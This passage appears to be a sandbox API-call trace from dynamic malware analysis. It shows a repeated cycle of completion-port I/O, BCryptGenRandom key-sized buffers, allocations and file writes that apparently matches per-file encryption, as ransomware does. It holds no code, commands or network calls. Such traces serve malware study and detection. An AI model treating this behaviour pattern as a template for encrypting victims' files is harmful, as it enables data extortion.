(_Block=0x3df0008) [0167.183] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.191] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.192] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.192] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.192] free (_Block=0x3e305b8) [0167.192] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.192] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.193] free (_Block=0x1fa91d0) [0167.193] free (_Block=0x1fa2ed8) [0167.193] free (_Block=0x1fa90b8) [0167.193] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.194] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.206] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1afc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.207] CloseHandle (hObject=0x3cc) returned 1 [0167.207] free (_Block=0x3df0008) [0167.207] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.217] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.217] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.217] free (_Block=0x3e305b8) [0167.217] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.217] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.217] free (_Block=0x1fa91d0) [0167.217] free (_Block=0x1fa2ed8) [0167.217] free (_Block=0x1fa90b8) [0167.217] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.219] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb1b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.220] CloseHandle (hObject=0x3cc) returned 1 [0167.220] free (_Block=0x3df0008) [0167.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.231] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.231] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.231] free (_Block=0x3e305b8) [0167.231] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.231] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.231] free (_Block=0x1fa91d0) [0167.231] free (_Block=0x1fa2ed8) [0167.231] free (_Block=0x1fa90b8) [0167.231] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.232] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.233] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x9e30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.234] CloseHandle (hObject=0x3cc) returned 1 [0167.234] free (_Block=0x3df0008) [0167.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.243] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.243] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.243] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.243] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.244] free (_Block=0x3e305b8) [0167.244] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.244] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.244] free (_Block=0x1fa91d0) [0167.244] free (_Block=0x1fa2ed8) [0167.244] free (_Block=0x1fa90b8) [0167.244] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.246] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.258] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1908, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.259] CloseHandle (hObject=0x3cc) returned 1 [0167.259] free (_Block=0x3df0008) [0167.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.268] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.269] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.269] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.269] free (_Block=0x3e305b8) [0167.269] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.269] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.269] free (_Block=0x1fa91d0) [0167.269] free (_Block=0x1fa2ed8) [0167.269] free (_Block=0x1fa90b8) [0167.270] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.270] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.271] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.281] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2904, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.284] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.284] CloseHandle (hObject=0x3cc) returned 1 [0167.284] free (_Block=0x3df0008) [0167.284] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.319] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.320] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.321] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.321] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.321] free (_Block=0x3e305b8) [0167.321] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.321] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.321] free (_Block=0x1fa91d0) [0167.321] free (_Block=0x1fa2ed8) [0167.321] free (_Block=0x1fa90b8) [0167.322] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.322] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.329] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.330] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.330] free (_Block=0x3e305b8) [0167.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.330] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.331] free (_Block=0x1fa91d0) [0167.331] free (_Block=0x1fa2ed8) [0167.331] free (_Block=0x1fa90b8) [0167.331] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.342] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.350] CloseHandle (hObject=0x3cc) returned 1 [0167.350] free (_Block=0x3df0008) [0167.350] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.360] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.362] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.362] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.362] free (_Block=0x3e305b8) [0167.362] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.362] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.362] free (_Block=0x1fa91d0) [0167.362] free (_Block=0x1fa2ed8) [0167.363] free (_Block=0x1fa90b8) [0167.363] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.375] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.376] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.376] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.376] free (_Block=0x3e305b8) [0167.376] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.376] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.376] free (_Block=0x1fa91d0) [0167.377] free (_Block=0x1fa2ed8) [0167.377] free (_Block=0x1fa90b8) [0167.377] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.388] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.388] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.388] free (_Block=0x3e305b8) [0167.388] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.388] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.389] free (_Block=0x1fa91d0) [0167.389] free (_Block=0x1fa2ed8) [0167.389] free (_Block=0x1fa90b8) [0167.389] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0167.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.396] CloseHandle (hObject=0x2a8) returned 1 [0167.397] free (_Block=0x3d70450) [0167.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.404] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x23d4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.419] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.431] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.431] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.431] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.431] free (_Block=0x3e305b8) [0167.431] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.431] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.432] free (_Block=0x1fa91d0) [0167.432] free (_Block=0x1fa2ed8) [0167.432] free (_Block=0x1fa90b8) [0167.432] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0167.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0167.444] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0167.445] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0167.446] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.446] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 